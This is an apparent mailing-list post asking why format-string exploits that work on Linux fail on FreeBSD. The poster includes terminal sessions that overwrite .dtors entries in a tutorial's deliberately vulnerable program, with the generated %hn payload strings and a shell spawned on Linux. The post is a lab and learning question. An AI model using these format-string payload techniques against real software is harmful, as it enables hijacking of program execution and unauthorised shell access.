Formatstrings on *BSD

[Vail () gmx net]

hi folks, i got a question to formatstring attacks and the diff between
linux and *BSD stack. I can manage
to exploit some vuln progs on linux, but every attempt to exploit the same
on FreeBSD for example fails. 

The only thing i could imagin is, that the stack behaviour is somewhat diff,
so that for example
the build*.c from
http://www.linuxfocus.org/English/July2001/article191.shtml would produce fmts that
are not compliant to fbsd... anyone a guess where the diff in exploiting fmt
is? Or some good url/doc regarding
specifics on *BSD & fmt attacks?

First here my doing on linux (using the vuln.c from the link above):

-------------------------------linux-------------------------------
admin@linux:~> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049a64 ffffffff 00000000                    ........

admin@linux:~> ./bui2 8049a68 8
Calling ./bui2 ...
adr : 134519400 (8049a68)
val : -1073744136 (bffff6f8)
valh: 49151 (bfff)
vall: 63224 (f6f8)
[%.49143x%8$hn%.14073x%9$hn] (34)
Calling ./vuln ...
sc = 0xbffff8be
adr : 134519400 (8049a68)
val : -1073743682 (bffff8be)
valh: 49151 (bfff)
vall: 63678 (f8be)
[%.49143x%8$hn%.14527x%9$hn] (34)
0 0xbffff894
1 0xbffff89b
2 0xbffff8be
3 0xbffff8ec
4 0xbffff8f4
helloWorld() = 0x8048770
accessForbidden() = 0x80487b0

before : ptrf() = 0x8048770 (0xbffff5fc)
buffer =
[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]
 (127)
after : ptrf() = 0x8048770 (0xbffff5fc)
Welcome in "helloWorld"
sh-2.05$
-------------------------------linux-------------------------------

Works quite fine ;)
Now, i changed the shellcode of build2 to fbsd shellcode and
tried to exploit it:

-------------------------------freebsd-------------------------------
> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049958 ffffffff 00000000                    ........
> ./bui2 804995c 8
Calling ./bui2 ...
adr : 134519132 (804995c)
val : -1077937316 (bfbffb5c)
valh: 49087 (bfbf)
vall: 64348 (fb5c)
[%.-16457x%8$hn%.15261x%9$hn] (35)
Calling ./vuln ...
sc = 0xbfbffc9f
adr : 134519132 (804995c)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)
[%.-16457x%8$hn%.15584x%9$hn] (35)
0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcec
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffa74)
buffer = [2805f000                                                          
                                                    ] (127)
after : ptrf() = 0x8048770 (0xbfbffa74)
Welcome in "helloWorld"
Segmentation fault (core dumped)

-------------------------------freebsd-------------------------------

I can try what i want (change values, shellcode, padding) it never executes
a shell...

What i found out myself, is that some values to write with %n seem to
trouble fbsd,
for example i wanted to write my shellcode-addr to 0xbfbffa74 (addr of the
pointer), on
linux this works fine, on fbsd i get *strange* values after writing to
0xbfbffa74

> ./bui2 0xbfbffa74 8
Calling ./bui2 ...
adr : -1077937548 (bfbffa74)
val : -1077937320 (bfbffb58)
valh: 49087 (bfbf)
vall: 64344 (fb58)
[vú¿¿tú¿¿%.-16457x%8$hn%.15257x%9$hn] (35)
Calling ./vuln ...
sc = 0xbfbffc9f
adr : -1077937548 (bfbffa74)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)
[vú¿¿tú¿¿%.-16457x%8$hn%.15584x%9$hn] (35)
0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcef
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffa74)
buffer = [vú¿¿tú¿¿2805f000                                                  
                                                            ] (127)
after : ptrf() = 0x40517d31 (0xbfbffa74)    // 0x40517d31 !? THATS surely
NOT my shellcode adress (it's sc = 0xbfbffc9f) 
Segmentation fault (core dumped)

Anyone a clue?

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!